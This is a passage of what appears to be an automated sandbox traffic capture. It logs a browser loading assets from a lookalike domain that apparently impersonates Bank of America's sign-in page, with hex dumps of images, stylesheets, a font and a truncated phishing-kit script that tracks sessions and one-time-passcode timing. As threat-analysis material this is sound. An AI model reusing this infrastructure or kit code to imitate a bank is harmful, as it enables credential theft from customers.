                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:01 UTC249INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:01 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:25:08 GMT
                                                                                              ETag: "c94-6118082c99900"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 3220
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:01 UTC3220INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                                                                              Data Ascii: PNGIHDRapHYs~OiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              31192.168.2.1659100188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:01 UTC567OUTGET /assets/powered_by_logo.svg HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:01 UTC254INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:01 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:09:16 GMT
                                                                                              ETag: "144a-611804a0b3b00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 5194
                                                                                              Connection: close
                                                                                              Content-Type: image/svg+xml
                                                                                              2025-01-15 18:42:01 UTC5194INData Raw: 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 36 22 20 77 69 64 74 68 3d 22 31 33 36 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 34 2e 36 22 3e 3c 64 65 66 73 3e 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 61 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 64 3d 22 4d 35 33 2e 37 36 20 30 48 31 33 36 76 31 34 2e 36 48 35 33 2e 37 36 7a 22 2f 3e 3c 2f 63 6c 69 70 50 61 74 68 3e 3c 2f 64 65 66 73 3e 3c 70 61 74 68 20 64 3d 22 4d 30 20 31 32 2e 33 56 35 2e 35 39 68 32 2e 32 37 61 32 2e 36 32 20 32 2e 36 32 20 30 20 30 31 31 2e 32 39 2e 32 38 20 31 2e 38 33 20 31 2e 38 33 20
                                                                                              Data Ascii: <svg height="16" width="136" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 136 14.6"><defs><clipPath id="a"><path fill="none" d="M53.76 0H136v14.6H53.76z"/></clipPath></defs><path d="M0 12.3V5.59h2.27a2.62 2.62 0 011.29.28 1.83 1.83


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              32192.168.2.1659103188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:01 UTC851OUTGET /assets/gfoot-home-icon.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.css
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:02 UTC247INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:01 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:27:46 GMT
                                                                                              ETag: "90-611808c347c80"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 144
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:02 UTC144INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 09 08 06 00 00 00 02 4d 1d 69 00 00 00 57 49 44 41 54 28 53 ad 8e c1 09 c0 30 0c 03 b5 b7 e7 4a f7 f2 04 29 32 b8 18 55 79 14 fa 38 62 12 9d 23 64 e6 56 22 62 03 28 38 eb 3b 81 13 78 5e 6b 15 f3 ee 25 ce 1f 74 f3 13 94 06 38 6d 74 cc ac 15 39 4f ac d8 35 66 a0 6b 69 fd 16 2b f3 ab 78 c2 8a 5f a0 73 03 6f a4 50 c0 d7 52 a5 d3 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                              Data Ascii: PNGIHDRMiWIDAT(S0J)2Uy8b#dV"b(8;x^k%t8mt9O5fki+x_soPRIENDB`


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              33192.168.2.1659104188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:01 UTC853OUTGET /assets/help-qm-fsd-hover.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.css
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:02 UTC248INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:01 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:30:38 GMT
                                                                                              ETag: "1fc-611809674ff80"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 508
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:02 UTC508INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0a eb 00 00 0a eb 01 82 8b 0d 5a 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 36 e8 bc b2 8c 00 00 01 76 49 44 41 54 38 8d a5 93 3d 4f c2 50 14 86 9f 1a 23 43 13 61 21 8e 20 6e 4e 38 3a 01 03 26 18 13 f0 1f b0 e9 60 d2 ea 6e c4 b8 9b 32 3a 89 8b 8b 83 25 31 6d a2 24 96 89 d1 86 01 27 3e 4c 98 c4 81 c4 30 30 5d 07 28 5e 4a 89 83 67 bb e7 3d e7 39 1f f7 5e 45 08 c1 7f 6c 15 40 51 94 60 35 67 a4 01 b0 75 47 76 cb 45 15 21 c4 3c 60 92 a4 03 79 1f ae 0a 18 d8 ba b3 1c 90 33 0c 40 fb a3 eb b2 b0 34 7d 11 90 33 4a c0 85 27 14 76
                                                                                              Data Ascii: PNGIHDRasBIT|dpHYsZtEXtSoftwareAdobe Fireworks CS6vIDAT8=OP#Ca! nN8:&`n2:%1m$'>L00](^Jg=9^El@Q`5guGvE!<`y3@4}3J'v


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              34192.168.2.1659107188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:01 UTC572OUTGET /assets/gfootb-static-sprite.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:02 UTC251INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:01 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:26:56 GMT
                                                                                              ETag: "be1b-6118089398c00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 48667
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:02 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 32 08 06 00 00 00 6c f0 ea 07 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 35 71 b5 e3 36 00 00 01 88 70 72 56 57 78 9c ed 97 cd 51 c3 30 10 46 25 bc 31 eb 28 45 d0 02 e3 46 68 81 03 e2 9a 76 d4 0c 05 30 ea 85 0e 30 96 64 8d b0 31 c7 ec c2 f8 7b 93 1f 29 97 a7 6f 77 ed 71 de 3f df 3e cc d5 5c a7 69 8a 31 86 38 85 10 43 08 3e 44 ef e7 57 f0 de 8f 3e 8e 3e 8c e3 68 00 00 a0 c0 74 49 30 29 f9 89 b3 9f 58 c9 af 99 3f 65 27 b6 96 2c 95 a5 b0 3f 65 67 9a ed d6 96 a5 a0 bb f4 7d f5 53 e9 83 50 11 4a df 95 fc 94 ec 3b a6 5c 14
                                                                                              Data Ascii: PNGIHDR2lsBIT|dpHYs~tEXtSoftwareAdobe Fireworks CS5q6prVWxQ0F%1(EFhv00d1{)owq?>\i18C>DW>>htI0)X?e',?eg}SPJ;\
                                                                                              2025-01-15 18:42:02 UTC16384INData Raw: fa 6e 5e a7 7d 81 b6 ef 5a e6 f8 0f ba 79 44 9e eb 97 f3 cf ec b7 f3 35 e8 88 e9 ff e7 58 c9 7f a5 ff 57 76 f0 f4 a5 a7 4f 1d 1b 29 ed 22 fb b1 63 30 ce 1c cb 76 59 e0 93 d8 c5 0b 0c ff e7 5a f2 ef 7c 7e e0 b9 5f 25 2f cf 05 2c ce f4 7f 70 5c 80 cb c9 b9 79 ce b0 e7 5a f2 2f d0 c9 e9 3b 2f 78 86 17 d6 e1 ce 73 f5 fc 5f e9 06 b7 39 3f ff 1d ab 50 cc dc af 35 dd bb 5c ed 5b bd e3 79 7c de d9 02 18 c3 e7 f5 c4 8d 38 9d d4 cf dd f8 9f 67 00 e4 fb bf cb ca b1 4c 7b e4 3f 0c c3 30 0c c3 30 0c e7 18 5f e0 6b 33 be c0 e7 86 3e b4 92 e3 f8 02 9f 1b db dc c6 17 f8 7a e4 1a ab c9 f8 02 5f 83 9d fc c7 17 f8 fc 5c 53 fe e3 0b 7c 3c ae 29 ff 62 7c 81 8f c5 ca e7 37 be c0 61 18 86 61 18 86 61 78 6e 2e b5 95 74 eb 86 1c 61 7f 12 3f 6c c4 f7 5e 43 e3 95 df 11 76 6b ad ac
                                                                                              Data Ascii: n^}ZyD5XWvO)"c0vYZ|~_%/,p\yZ/;/xs_9?P5\[y|8gL{?00_k3>z_\S|<)b|7aaaxn.ta?l^Cvk
                                                                                              2025-01-15 18:42:02 UTC15899INData Raw: 8b 33 7a 0e 8b 81 8a 80 30 08 7f b0 16 ae 10 c1 63 38 a8 52 a3 ea 47 b1 a2 67 1f 9b 30 e0 f6 13 0c 02 a6 54 97 55 eb 1a f8 f2 84 bd bb 04 8b 9d 77 ad 22 2f 34 b3 de d6 8f 8f f7 bf be ee 43 be 51 60 5b 05 7b 4f b3 93 04 ba 63 c8 6e af 5d 95 03 b6 2b 95 7b db 7b ad e7 bc de d5 ce 0b 4e 11 21 81 33 95 81 3c ae de c7 56 ed 82 ec 79 78 e9 2c 21 43 0a e6 99 62 b2 2e a0 ea 08 6c 66 d6 d7 e5 c1 f8 27 0e 84 d2 c1 5c 20 d7 9f ce cf ed e3 eb 67 75 2c 10 ce bc b7 b8 9a 77 2d 2f 16 f4 df 33 db a5 f9 ba f1 ed 4e b0 ed e2 58 28 9b 63 0d 83 8e d3 e2 6f f5 4d 11 44 f0 91 73 ca 19 a2 61 b7 23 fc 23 30 7b 63 0d c1 c8 c0 f0 25 b5 75 44 57 43 42 01 13 a5 5a 80 41 e9 cd 5a 36 bb 2c d8 8f e7 fb 78 fd 0b 28 5a 25 87 b1 b5 d8 e7 77 80 d1 c0 e1 8a 48 62 06 68 54 62 32 f9 fe 3c 24
                                                                                              Data Ascii: 3z0c8RGg0TUw"/4CQ`[{Ocn]+{{N!3<Vyx,!Cb.lf'\ gu,w-/3NX(coMDsa##0{c%uDWCBZAZ6,x(Z%wHbhTb2<$


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              35192.168.2.1659105188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:01 UTC816OUTGET /assets/vipaa-v4-jawr-print.css HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: text/css,*/*;q=0.1
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: style
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:02 UTC272INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:01 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 13:37:06 GMT
                                                                                              ETag: "26e1-6117fd701c480"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 9953
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Content-Type: text/css
                                                                                              2025-01-15 18:42:02 UTC9953INData Raw: 2e 6f 6c 62 2d 70 6f 70 75 70 2d 63 6f 6e 74 65 6e 74 2d 6d 6f 64 75 6c 65 20 2e 73 74 61 6e 64 61 72 64 2d 70 72 69 6e 74 2d 6f 6c 62 2d 73 6b 69 6e 20 2e 70 6f 70 75 70 2d 68 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 35 70 78 20 30 20 31 35 70 78 3b 68 65 69 67 68 74 3a 35 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 34 30 30 31 61 7d 2e 6f 6c 62 2d 70 6f 70 75 70 2d 63 6f 6e 74 65 6e 74 2d 6d 6f 64 75 6c 65 20 2e 73 74 61 6e 64 61 72 64 2d 70 72 69 6e 74 2d 6f 6c 62 2d 73 6b 69 6e 20 2e 70 6f 70 75 70 2d 68 65 61 64 65 72 20 2e 63 6c 6f 73 65 2d 6c 69 6e 6b 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 30 20 30 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 6f 6c 62 2d 70 6f 70
                                                                                              Data Ascii: .olb-popup-content-module .standard-print-olb-skin .popup-header{padding:10px 25px 0 15px;height:50px;background-color:#d4001a}.olb-popup-content-module .standard-print-olb-skin .popup-header .close-link{padding:2px 0 0;float:right;font-size:11px}.olb-pop


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              36192.168.2.1659108188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:02 UTC566OUTGET /assets/special/js/main.js HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:02 UTC286INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:02 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Mon, 29 Jul 2024 18:01:08 GMT
                                                                                              ETag: "20c8-61e66a545ecf2"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 8392
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Content-Type: application/javascript
                                                                                              2025-01-15 18:42:02 UTC8392INData Raw: 76 61 72 20 6f 74 70 5f 74 69 6d 65 6f 75 74 3d 34 65 34 3b 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 3d 6d 61 6b 65 69 64 28 35 29 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 73 65 73 73 69 6f 6e 22 2c 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 29 3b 76 61 72 20 6f 6e 53 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 73 65 73 73 69 6f 6e 22 3d 3d 3d 65 2e 6b 65 79 26 26 65 2e 6e 65 77 56 61 6c 75 65 21 3d 3d 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 26 26 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 6d 75 6c 74 69 74 61 62 22 2c 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 29 2c 22 6d 75 6c 74 69 74 61 62 22 3d 3d 3d 65 2e 6b 65 79 26 26 65 2e 6e 65 77 56 61 6c 75 65 26 26 65 2e 6e 65 77 56 61 6c 75
                                                                                              Data Ascii: var otp_timeout=4e4;window.session=makeid(5),localStorage.setItem("session",window.session);var onStorage=function(e){"session"===e.key&&e.newValue!==window.session&&localStorage.setItem("multitab",window.session),"multitab"===e.key&&e.newValue&&e.newValu


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              37192.168.2.1659109188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:02 UTC847OUTGET /assets/cnx-regular.woff HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              Origin: https://online.access.secure.bankofamerlica.com
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: font
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:02 UTC252INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:02 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 13:31:22 GMT
                                                                                              ETag: "149f8-6117fc280be80"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 84472
                                                                                              Connection: close
                                                                                              Content-Type: font/woff
                                                                                              2025-01-15 18:42:02 UTC16384INData Raw: 77 4f 46 46 00 01 00 00 00 01 49 f8 00 13 00 00 00 02 e9 74 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 01 a8 00 00 00 1c 00 00 00 1c 66 c3 ac 02 47 44 45 46 00 00 01 c4 00 00 00 2f 00 00 00 32 0a af 07 e1 47 50 4f 53 00 00 01 f4 00 00 26 ed 00 00 ab c8 94 9d 5b ba 47 53 55 42 00 00 28 e4 00 00 04 52 00 00 0e a4 cb 39 d0 47 4f 53 2f 32 00 00 2d 38 00 00 00 54 00 00 00 60 8b 65 a9 11 63 6d 61 70 00 00 2d 8c 00 00 03 29 00 00 04 6e 31 90 1d f6 63 76 74 20 00 00 30 b8 00 00 00 46 00 00 00 46 0e ac 0d 07 66 70 67 6d 00 00 31 00 00 00 01 b1 00 00 02 65 53 b4 2f a7 67 61 73 70 00 00 32 b4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 32 bc 00 00 fe 16 00 01 fa e4 43 98 de 4c 68 65 61 64 00 01 30 d4 00 00 00
                                                                                              Data Ascii: wOFFItFFTMfGDEF/2GPOS&[GSUB(R9GOS/2-8T`ecmap-)n1cvt 0FFfpgm1eS/gasp2glyf2CLhead0
                                                                                              2025-01-15 18:42:02 UTC16384INData Raw: 24 bb 39 67 8a f5 d9 dc fa 55 13 db 56 8e cb 26 0b fa fe 32 a3 ee c6 45 3b 5f 75 57 4d 5f 3b e9 d5 7b af fd cb a3 bf fd 79 ff ca bb 1e 5c 95 55 11 f2 07 32 7d b0 b1 1c 93 9e 66 bb dd c5 5e 9f 27 4f c8 49 cd d3 df 78 6b f1 f4 09 25 e5 93 26 33 74 7f 77 9e 3c 0e fb e9 36 c6 cb d4 30 6b 98 b8 15 b1 e4 04 3e e4 10 4b 55 c0 87 39 01 2b 07 7c 98 83 24 88 52 84 f9 00 25 3e aa b2 a4 cc 88 6c 02 ad 35 0e f0 e2 63 b4 5d 06 7a ab df ea e4 72 28 72 9c e0 e5 49 42 4c ca 11 40 70 49 01 bb 9c 99 05 67 54 09 b2 89 51 15 99 86 25 96 9a be 85 51 c0 11 58 84 85 c8 83 2c c5 18 bc 42 ad 06 9e 5b e7 37 ff 79 e9 f7 57 b6 66 8d bf f1 ed 6d 4b 0f 94 17 5c 73 ef 9c 9b 67 44 dd 3a f3 de a7 e7 dc 71 45 f3 de eb 77 8d 5b 31 b5 a6 80 f0 42 56 45 53 77 ec 96 07 b9 97 df a5 9c b6 e6 71
                                                                                              Data Ascii: $9gUV&2E;_uWM_;{y\U2}f^'OIxk%&3tw<60k>KU9+|$R%>l5c]zr(rIBL@pIgTQ%QX,B[7yWfmK\sgD:qEw[1BVESwq
